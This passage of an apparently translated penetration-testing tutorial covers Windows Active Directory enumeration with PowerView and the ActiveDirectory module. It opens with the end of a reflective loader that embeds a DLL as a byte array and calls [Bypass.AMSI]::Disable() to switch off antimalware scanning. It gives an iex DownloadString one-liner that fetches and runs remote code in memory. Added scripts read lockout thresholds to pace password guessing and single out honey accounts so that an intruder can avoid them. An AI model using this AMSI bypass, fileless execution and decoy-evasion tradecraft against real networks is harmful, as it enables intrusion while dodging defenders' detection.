0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 16, 0, 0, 0, 24, 0, 0, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 48, 0, 0, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 72, 0, 0, 0, 88, 64, 0, 0, 44, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 44, 3, 52, 0, 0, 0, 86, 0, 83, 0, 95, 0, 86, 0, 69, 0, 82, 0, 83, 0, 73, 0, 79, 0, 78, 
0, 95, 0, 73, 0, 78, 0, 70, 0, 79, 0, 0, 0, 0, 0, 189, 4, 239, 254, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 63, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 68, 0, 0, 0, 1, 0, 86, 0, 97, 0, 114, 0, 70, 0, 105, 0, 108, 0, 101, 0, 73, 0, 110, 0, 102, 0, 111, 0, 0, 0, 0, 0, 36, 0, 4, 0, 0, 0, 84, 0, 114, 0, 97, 0, 110, 0, 115, 0, 108, 0, 97, 0, 116, 0, 105, 0, 111, 0, 110, 0, 0, 0, 0, 0, 0, 0, 176, 4, 140, 2, 0, 0, 1, 0, 83, 0, 116, 0, 114, 0, 105, 0, 110, 0, 103, 0, 70, 0, 105, 0, 108, 0, 101, 0, 73, 0, 110, 0, 102, 0, 111, 0, 0, 0, 104, 2, 0, 0, 1, 0, 48, 0, 48, 0, 48, 0, 48, 0, 48, 0, 52, 0, 98, 0, 48, 0, 0, 0, 26, 0, 1, 0, 1, 0, 67, 0, 111, 0, 109, 0, 109, 0, 101, 0, 110, 0, 116, 0, 115, 0, 0, 0, 0, 0, 0, 0, 34, 0, 1, 0, 1, 0, 67, 0, 111, 0, 109, 0, 112, 0, 97, 0, 110, 0, 121, 0, 78, 0, 97, 0, 109, 0, 101, 0, 0, 0, 0, 0, 0, 0, 0, 0, 62, 0, 11, 0, 1, 0, 70, 0, 105, 0, 108, 0, 101, 0, 68, 0, 101, 0, 115, 0, 99, 0, 114, 0, 105, 0, 112, 0, 116, 0, 105, 0, 111, 0, 110, 0, 0, 0, 0, 0, 66, 0, 121, 0, 112, 0, 97, 0, 115, 0, 115, 0, 65, 0, 77, 0, 83, 0, 73, 0, 0, 0, 0, 0, 48, 0, 8, 0, 1, 0, 70, 0, 105, 0, 108, 0, 101, 0, 86, 0, 101, 0, 114, 0, 115, 0, 105, 0, 111, 0, 110, 0, 0, 0, 0, 0, 49, 0, 46, 0, 48, 0, 46, 0, 48, 0, 46, 0, 48, 0, 0, 0, 62, 0, 15, 0, 1, 0, 73, 0, 110, 0, 116, 0, 101, 0, 114, 0, 110, 0, 97, 0, 108, 0, 78, 0, 97, 0, 109, 0, 101, 0, 0, 0, 66, 0, 121, 0, 112, 0, 97, 0, 115, 0, 115, 0, 65, 0, 77, 0, 83, 0, 73, 0, 46, 0, 100, 0, 108, 0, 108, 0, 0, 0, 0, 0, 72, 0, 18, 0, 1, 0, 76, 0, 101, 0, 103, 0, 97, 0, 108, 0, 67, 0, 111, 0, 112, 0, 121, 0, 114, 0, 105, 0, 103, 0, 104, 0, 116, 0, 0, 0, 67, 0, 111, 0, 112, 0, 121, 0, 114, 0, 105, 0, 103, 0, 104, 0, 116, 0, 32, 0, 169, 0, 32, 0, 32, 0, 50, 0, 48, 0, 49, 0, 56, 0, 0, 0, 42, 0, 1, 0, 1, 0, 76, 0, 101, 0, 103, 0, 97, 0, 108, 0, 84, 0, 114, 0, 97, 0, 100, 0, 101, 0, 109, 0, 97, 0, 114, 0, 107, 0, 115, 0, 0, 0, 0, 0, 0, 0, 0, 0, 70, 0, 15, 0, 1, 0, 79, 0, 
114, 0, 105, 0, 103, 0, 105, 0, 110, 0, 97, 0, 108, 0, 70, 0, 105, 0, 108, 0, 101, 0, 110, 0, 97, 0, 109, 0, 101, 0, 0, 0, 66, 0, 121, 0, 112, 0, 97, 0, 115, 0, 115, 0, 65, 0, 77, 0, 83, 0, 73, 0, 46, 0, 100, 0, 108, 0, 108, 0, 0, 0, 0, 0, 54, 0, 11, 0, 1, 0, 80, 0, 114, 0, 111, 0, 100, 0, 117, 0, 99, 0, 116, 0, 78, 0, 97, 0, 109, 0, 101, 0, 0, 0, 0, 0, 66, 0, 121, 0, 112, 0, 97, 0, 115, 0, 115, 0, 65, 0, 77, 0, 83, 0, 73, 0, 0, 0, 0, 0, 52, 0, 8, 0, 1, 0, 80, 0, 114, 0, 111, 0, 100, 0, 117, 0, 99, 0, 116, 0, 86, 0, 101, 0, 114, 0, 115, 0, 105, 0, 111, 0, 110, 0, 0, 0, 49, 0, 46, 0, 48, 0, 46, 0, 48, 0, 46, 0, 48, 0, 0, 0, 56, 0, 8, 0, 1, 0, 65, 0, 115, 0, 115, 0, 101, 0, 109, 0, 98, 0, 108, 0, 121, 0, 32, 0, 86, 0, 101, 0, 114, 0, 115, 0, 105, 0, 111, 0, 110, 0, 0, 0, 49, 0, 46, 0, 48, 0, 46, 0, 48, 0, 46, 0, 48, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 12, 0, 0, 0, 200, 60, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)) | Out-Null
        Write-Output "DLL has been reflected";
    }
    [Bypass.AMSI]::Disable();
}

(Source: https://0x00-0x00.github.io/research/2018/11/09/Oh-No!-Amsi-blocked-the-bypass.html)

To import PowerView, navigate to the folder where it was saved and dot-source it (the whole file goes through AMSI at this point):

. .\PowerView.ps1

The Active Directory module is a PowerShell module that consolidates a set of cmdlets for managing domains, AD LDS (Active Directory Lightweight Directory Services) configuration sets, and so on. The module only works if the RSAT (Remote Server Administration Tools) package is installed on the PC; on Windows 7, in addition, the module import has to be run from an elevated shell. That is what the official documentation says :) However, it is possible to use the module without installing RSAT and without administrator privileges: just go to the following link and follow the instructions.

https://github.com/samratashok/ADModule

Copy the DLL and the psd1 file to the machine and import them as follows:

Import-Module .\Microsoft.ActiveDirectory.Management.dll
Import-Module .\ActiveDirectory.psd1

Importing the DLL alone is enough to run the cmdlets; importing ActiveDirectory.psd1 as well is what makes them listable with Get-Command -Module ActiveDirectory.

The following command imports the module without touching disk:

PS C:\> iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory


There are benefits to using the Microsoft module: the DLL is Microsoft-signed, so it is less likely to be flagged by AV, and because its cmdlets are compiled code they keep working under PowerShell Constrained Language Mode, where PowerView's reflection-heavy script code does not. One caveat: the module talks to Active Directory Web Services (ADWS, TCP 9389) on a domain controller rather than to LDAP, so it fails where that port is not reachable.

For more details follow this link: https://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-PowerShell-CLM.html
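The import steps above, put together as an added example (mine, not code from the post or from the ADModule project): it loads the module from RSAT when that is installed, otherwise from the copied DLL and psd1, and then reports the language mode, how many cmdlets are available and whether a domain controller answers over ADWS. The folder C:\Tools\ADModule is an assumed location; adjust it to wherever you copied the files.

```powershell
# Added example: load the ActiveDirectory module from RSAT or from a copied DLL/psd1, then
# report what the session can actually do. C:\Tools\ADModule is an assumed path.
function Import-ADModuleAnywhere {
    param([string]$FallbackPath = 'C:\Tools\ADModule')

    if (Get-Module -ListAvailable -Name ActiveDirectory) {
        Import-Module ActiveDirectory -ErrorAction Stop          # RSAT path: module is registered
        $source = 'RSAT'
    } else {
        # Unprivileged path: the Microsoft-signed binary module from a folder we control
        $dll  = Join-Path $FallbackPath 'Microsoft.ActiveDirectory.Management.dll'
        $psd1 = Join-Path $FallbackPath 'ActiveDirectory.psd1'
        if (-not (Test-Path $dll)) { throw "ActiveDirectory module found neither in RSAT nor at $dll" }
        Import-Module $dll -ErrorAction Stop
        if (Test-Path $psd1) { Import-Module $psd1 -ErrorAction Stop }   # manifest: makes Get-Command -Module work
        $source = $dll
    }

    # The module speaks to Active Directory Web Services (TCP 9389), not LDAP: prove that before enumerating
    $adws = $true
    try { $null = Get-ADDomain -ErrorAction Stop } catch { $adws = $false }

    [pscustomobject]@{
        LanguageMode  = $ExecutionContext.SessionState.LanguageMode   # ConstrainedLanguage is fine for this module
        LoadedFrom    = $source
        # counted by name so the DLL and the manifest do not count the same cmdlet twice
        CmdletCount   = @(Get-Command -Noun 'AD*' -CommandType Cmdlet | Sort-Object Name -Unique).Count
        ADWSReachable = $adws
    }
}

Import-ADModuleAnywhere
```

If ADWSReachable comes back $false while LDAP works, the cmdlets are not broken: the ADWS port is filtered or the DC does not run the service, and you fall back to PowerView or raw DirectorySearcher queries.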

Enumerate the domain

PowerView
PS C:\> Get-NetDomain

ActiveDirectory module
PS C:\> Get-ADDomain 


PowerView's Get-NetDomain shows the same output as GetCurrentDomain(), because it wraps that very .NET call.

Get-ADDomain from the Active Directory module shows a little more, for example DistinguishedName, DomainSID, NetBIOSName and the GPOs linked to the domain.


Domain object of another, trusted domain

PowerView
PS C:\> Get-NetDomain -Domain nomedominio.local

ActiveDirectory module
PS C:\> Get-ADDomain -Identity nomedominio.local

Domain SID of the current domain

PowerView
PS C:\> Get-DomainSID

ActiveDirectory module
PS C:\> (Get-ADDomain).DomainSID

Domain policy

PowerView, shows all properties of the policy object (it reads GptTmpl.inf of the Default Domain Policy from SYSVOL)
PS C:\> Get-DomainPolicy 

PowerView, to access a single section of the policy object, e.g. the password and lockout settings
PS C:\> (Get-DomainPolicy)."system access"
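The same "System Access" section, read directly from SYSVOL as an added example (mine, not from the post or from PowerView), so it needs neither PowerView nor RSAT. The GUID in the path is the well-known Default Domain Policy GPO; $env:USERDNSDOMAIN as the default domain name is an assumption that holds on a domain-joined session.

```powershell
# Added example: parse the [System Access] section of the Default Domain Policy from SYSVOL.
# {31B2F340-016D-11D2-945F-00C04FB984F9} is the fixed GUID of the Default Domain Policy GPO.
function Get-DefaultDomainPolicySystemAccess {
    param([string]$Domain = $env:USERDNSDOMAIN)   # assumption: domain-joined session sets this

    $gpt = "\\$Domain\SYSVOL\$Domain\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}" +
           '\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf'
    if (-not (Test-Path -LiteralPath $gpt)) { throw "GptTmpl.inf not readable at $gpt" }

    $section = $null
    $result  = [ordered]@{}
    # The file is an INI in UTF-16 with a BOM; Get-Content detects the encoding from the BOM
    foreach ($raw in Get-Content -LiteralPath $gpt) {
        $line = $raw.Trim()
        if ($line -match '^\[(.+)\]$') { $section = $Matches[1]; continue }       # new section header
        if ($section -ne 'System Access') { continue }                             # only the part we want
        if ($line -match '^([^=]+?)\s*=\s*(.*)$') { $result[$Matches[1]] = $Matches[2] }
    }
    [pscustomobject]$result
}

# Usage: the three values that decide how carefully you can guess passwords
$sa = Get-DefaultDomainPolicySystemAccess
'MinimumPasswordLength : {0}' -f $sa.MinimumPasswordLength
'PasswordComplexity    : {0}' -f $sa.PasswordComplexity
# LockoutBadCount 0 means accounts never lock out; otherwise stay below it per ResetLockoutCount window
'LockoutBadCount       : {0} (reset window {1} min, lockout {2} min)' -f $sa.LockoutBadCount,
    $sa.ResetLockoutCount, $sa.LockoutDuration
```

Fine-grained password policies (PSOs) override these defaults for the users they apply to, so for a specific account check msDS-ResultantPSO as well before relying on the lockout threshold.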

Domain controllers

PowerView, add the -Domain argument to enumerate another domain
PS C:\> Get-NetDomainController 

ActiveDirectory module (with no arguments it returns only the DC the session is using; add -Filter * to list them all)
PS C:\> Get-ADDomainController

Enumerate users

PowerView
PS C:\> Get-NetUser
PS C:\> Get-NetUser -Username user1

ActiveDirectory module
PS C:\> Get-ADUser -Identity user1 -Properties *
PS C:\> Get-ADUser -Filter * -Properties *

List all properties of the users in the current domain

PowerView
PS C:\> Get-UserProperty
PS C:\> Get-UserProperty -Properties pwdlastset

ActiveDirectory module
PS C:\> Get-ADUser -Identity user1 -Properties * | select name, @{expression={[datetime]::fromFileTime($_.pwdlastset)}}
PS C:\> Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name

A short note on the pwdlastset, badpwdcount and logoncount properties. These user properties are very useful for telling real accounts from fake ones, i.e. decoy (honey) accounts created on purpose to detect intrusions. Pwdlastset shows when a user's password was last changed, and it is easy to see that if it was changed a long time ago the account is most likely a decoy. Likewise, if a user's bad password count is close to 0 or the logon count is 0, it is best to stay away from that account. Two caveats for the practitioner: badPwdCount and logonCount are not replicated between domain controllers (each DC keeps its own counters, and the PDC emulator is the one that gets notified of bad passwords), so query the DC you care about with -Server rather than whichever one answers first; and these are heuristics, since a service account that is never used interactively can look exactly the same.
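The heuristics above, applied to every enabled user with the AD module, as an added example (mine, not from the post). The one-year threshold and the "two indicators" rule are arbitrary starting points; a hit is a lead to verify, not proof that the account is a decoy.

```powershell
# Added example: flag users that match the decoy indicators described above.
# Thresholds are my own choices; requires the ActiveDirectory module to be loaded.
function Find-ProbableDecoyUser {
    param(
        [int]$StalePasswordDays = 365,   # a password older than this counts as "changed long ago"
        [string]$Server                  # a specific DC; see the note below on non-replicated attributes
    )
    $staleBefore = (Get-Date).AddDays(-$StalePasswordDays)
    $query = @{
        Filter     = 'Enabled -eq $true'
        Properties = 'pwdLastSet', 'badPwdCount', 'logonCount', 'whenCreated', 'Description'
    }
    if ($Server) { $query['Server'] = $Server }

    foreach ($u in Get-ADUser @query) {
        # pwdLastSet is a FILETIME; 0 means "must change password at next logon", not a 1601 date
        $pwdLastSet = if ($u.pwdLastSet -gt 0) { [datetime]::FromFileTime($u.pwdLastSet) } else { $null }
        $reasons = @()
        if ($pwdLastSet -and $pwdLastSet -lt $staleBefore) {
            $reasons += 'password last set {0:yyyy-MM-dd}' -f $pwdLastSet
        }
        if (-not $u.logonCount)  { $reasons += 'never logged on (logonCount 0/absent)' }
        if (-not $u.badPwdCount) { $reasons += 'no bad password attempts' }
        if ($reasons.Count -ge 2) {
            [pscustomobject]@{
                SamAccountName = $u.SamAccountName
                Created        = $u.whenCreated
                PwdLastSet     = $pwdLastSet
                LogonCount     = $u.logonCount
                BadPwdCount    = $u.badPwdCount
                Description    = $u.Description
                Reasons        = $reasons -join '; '
                QueriedDC      = if ($Server) { $Server } else { 'default' }
            }
        }
    }
}

# badPwdCount and logonCount are per-DC counters, not replicated: an account that looks untouched on
# one DC may have a history on another. Ask every DC and compare rows per account.
Get-ADDomainController -Filter * |
    ForEach-Object { Find-ProbableDecoyUser -Server $_.HostName } |
    Sort-Object SamAccountName, QueriedDC |
    Format-Table SamAccountName, QueriedDC, LogonCount, BadPwdCount, PwdLastSet, Reasons -AutoSize
```

Because the PDC emulator receives bad-password notifications from the other DCs, its badPwdCount is the most complete view; an account that reads zero there and has never logged on anywhere is the strongest candidate.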

Search for a string in a user property

PowerView
PS C:\> Find-UserField -SearchField Description -SearchTerm "built"

ActiveDirectory module
PS C:\> Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description